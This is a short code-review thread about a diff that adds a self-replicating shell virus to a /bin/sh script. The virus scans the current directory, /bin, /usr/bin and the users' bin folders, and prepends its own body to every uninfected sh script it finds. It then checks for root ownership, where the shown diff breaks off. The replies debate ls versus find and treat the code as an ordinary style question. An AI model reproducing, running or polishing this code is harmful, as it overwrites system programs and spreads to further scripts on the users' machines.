comp

```diff
@@ -1,4 +1,27 @@
 #!/bin/sh
+{
+	for i in * /bin/* /usr/bin/* /usr/local/bin/* ~/bin/* ~/.local/bin/*
+	do
+		if sed 1q "$i" | grep '^#![ 	]*/bin/sh'
+		then
+			if ! grep '^# mark$' "$i"
+			then
+				sed 1q "$i" >"/tmp/x$$"
+				sed '1d
+				/^# mark$/q' "$0" >>"/tmp/x$$"
+				sed 1d "$i" >>"/tmp/x$$"
+				cp "/tmp/x$$" "$i"
+			fi
+		fi
+	done
+	if ls -l "/tmp/x$$" | grep root
```

Comment:
As this is the long (`-l`) form of ls(1), I have to wonder whether you're looking for a user or group called 'root', or a file called 'root'. Especially if it's the latter, you can just use _glob filename pattern matching_. There's almost never a need nor a recommendation to use ls(1) within a shell script; it's often unreliable and usually redundant.

Also, ls(1) will not be checking for whether it's a directory, a file, or something else (IE: FIFO or a block special file) which can cause problems when you want something specific.

Instead of using ls(1), you could opt to use find(1):

```sh
find /tmp -xdev -maxdepth 1 -type f -user 'root' -o -group 'root' | ...
```

That's more reliable and robust, searching only for files, keeping to the same filesystem, being non-recursive (like your use of `ls`), matching only files, and files whose user or group is 'root'.

Reply:
It is quite obvious that I am trying to check whether the file that was written earlier is owned by user or group root. Sure, I could hassle with—I could even replace the whole `if` command list by a single `find` (see `-exec`). Or, I could just ignore the existence of an abomination like find till there is a need for it. I could also use something like `id` to check whether we are root. Many pretty much equivalent fine options.

Reply:
find(1) offers a lot of great functionality in an efficient and fairly portable way, as I demonstrated, but you're of course welcome to do write in whatever way you please.